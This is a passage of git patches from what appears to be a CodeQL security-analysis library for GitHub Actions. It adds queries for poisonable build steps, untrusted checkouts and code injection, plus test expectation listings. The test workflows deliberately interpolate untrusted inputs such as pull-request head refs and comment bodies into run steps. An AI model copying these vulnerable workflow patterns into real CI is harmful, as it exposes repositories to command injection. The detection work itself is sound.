scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:9:24:43 | .github/workflows/poisonable_steps.yml@24:9:24:43 | +| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:14:24:42 | .github/workflows/poisonable_steps.yml@24:14:24:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -855,7 +868,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | From 20ce5d5344c2c7b6ff441b4295397e41e0b75723 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 12:59:16 +0200 Subject: [PATCH 0381/1267] Add JS local imports as Poisonable steps --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 12 ++++++++++++ .../.github/workflows/poisonable_steps.yml | 5 +++++ ql/test/library-tests/poisonable_steps.expected | 13 +++++++------ 3 files changed, 24 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index b0c6f7aa6a9..e22662c64db 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -23,6 +23,18 @@ class PoisonableCommandStep extends PoisonableStep, Run { } } +class JavascriptImportnUsesStep extends PoisonableStep, UsesStep { + JavascriptImportnUsesStep() { + exists(string script, string line, string import_stmt | + this.getCallee() = "actions/github-script" and + script = this.getArgument("script") and + line = script.splitAt("\n").trim() and + import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and + import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*") + ) + } +} + class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 608b3d5a09f..7be32ca5c17 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -5,6 +5,11 @@ jobs: runs-on: ubuntu-latest steps: - run: venv/bin/activate # not supported yet + - uses: actions/github-script@v7 + with: + script: | + const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs') + return foo({ github, context, core }, body, number, sender) - run: . venv/bin/activate - run: echo foo; . venv/bin/activate - run: echo foo;. venv/bin/activate diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 52f38506f09..dc6b863d0b9 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,10 +1,6 @@ | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | @@ -16,4 +12,9 @@ | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | From 1657af60dfb3debdb0cd8066d7927f29487e969d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 12:59:36 +0200 Subject: [PATCH 0382/1267] Model get-workflow-origin action --- .../security/UntrustedCheckoutQuery.qll | 26 +++++++++++++------ .../potiuk_get-workflow-origin.model.yml | 6 +++++ 2 files changed, 24 insertions(+), 8 deletions(-) create mode 100644 ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 8187bca9f04..a0bf48f9beb 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -99,9 +99,13 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" ] and // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").matches("%.head_ref%") + this.getArgument("ref").regexpMatch(".*(head_ref).*") or - step.getCallee() = ["github/branch-deploy"] and + step.getCallee() = "potiuk/get-workflow-origin" and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"]) + or + step.getCallee() = "github/branch-deploy" and // TODO: This should be read step of the ref output var this.getArgument("ref").matches("%.ref%") ) and @@ -149,12 +153,18 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - this.getArgument("ref").regexpMatch(".*head_sha.*") and + ( + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and + this.getArgument("ref").regexpMatch(".*(head_sha).*") + or + step.getCallee() = "potiuk/get-workflow-origin" and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"]) + ) and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) or diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml new file mode 100644 index 00000000000..0acee71af26 --- /dev/null +++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"] From a2af3c654b59ae2a434d710b77aae82d01fdae5a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 20:46:29 +0200 Subject: [PATCH 0383/1267] Account for all npm and pnpm subcommands Exclude args such as `npm -v` --- ql/lib/ext/config/poisonable_steps.yml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index ff3df1f699c..56ba567aa45 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -32,12 +32,8 @@ extensions: - ["msbuild"] - ["mvn"] - ["mypy"] - - ["npm i(nstall)?"] - - ["npm run"] - - ["npm ci"] - - ["pnpm i(nstall)?"] - - ["pnpm run"] - - ["pnpm ci"] + - ["npm [a-z]"] + - ["pnpm [a-z]"] - ["pre-commit"] - ["prettier"] - ["pip install -r"] From ee265c48796441149bf579b81237eaf5359bbebb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:38:53 +0200 Subject: [PATCH 0384/1267] fix(models): Slash-command-action Do not consider slash-command-action command-arguments as a remote flow source if it requires write or admin permissions --- .../codeql/actions/dataflow/FlowSources.qll | 12 + ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +- .../xt0rted_slash-command-action.model.yml | 7 - ql/test/library-tests/test.expected | 414 +++++++++--------- .../.github/workflows/slash_command1.yml | 21 + .../.github/workflows/slash_command2.yml | 21 + .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 3 + 8 files changed, 294 insertions(+), 206 deletions(-) delete mode 100644 ql/lib/ext/manual/xt0rted_slash-command-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 79934ca586b..34f8c76df67 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -222,3 +222,15 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } } + +class Xt0rtedSlashCommandSource extends RemoteFlowSource { + Xt0rtedSlashCommandSource() { + exists(UsesStep u | + u.getCallee() = "xt0rted/slash-command-action" and + u.getArgument("permission-level").toLowerCase() = ["read", "none"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index caa09e9c7e2..46c42da2652 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -217,7 +217,7 @@ predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node suc */ predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { exists(StepsExpression o | - pred instanceof TJActionsChangedFilesSource and + pred instanceof TJActionsVerifyChangedFilesSource and o.getTarget() = pred.asExpr() and o.getStepId() = pred.asExpr().(UsesStep).getId() and o.getFieldName() = "changed_files" and @@ -225,12 +225,26 @@ predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::No ) } +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) or artifactDownloadToUseStep(node1, node2) or dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or - tjActionsVerifyChangedFilesTaintStep(node1, node2) + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) } } diff --git a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml deleted file mode 100644 index 0910261d21d..00000000000 --- a/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml +++ /dev/null @@ -1,7 +0,0 @@ -extensions: - - addsTo: - pack: github/actions-all - extensible: actionsSourceModel - data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 19eda82df48..c80dc006ce7 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -46,11 +46,7 @@ steps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | @@ -62,7 +58,12 @@ steps | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -92,23 +93,23 @@ runSteps | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -129,14 +130,17 @@ runExprs | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runStepChildren | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | @@ -171,23 +175,23 @@ runStepChildren | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -340,86 +344,94 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | 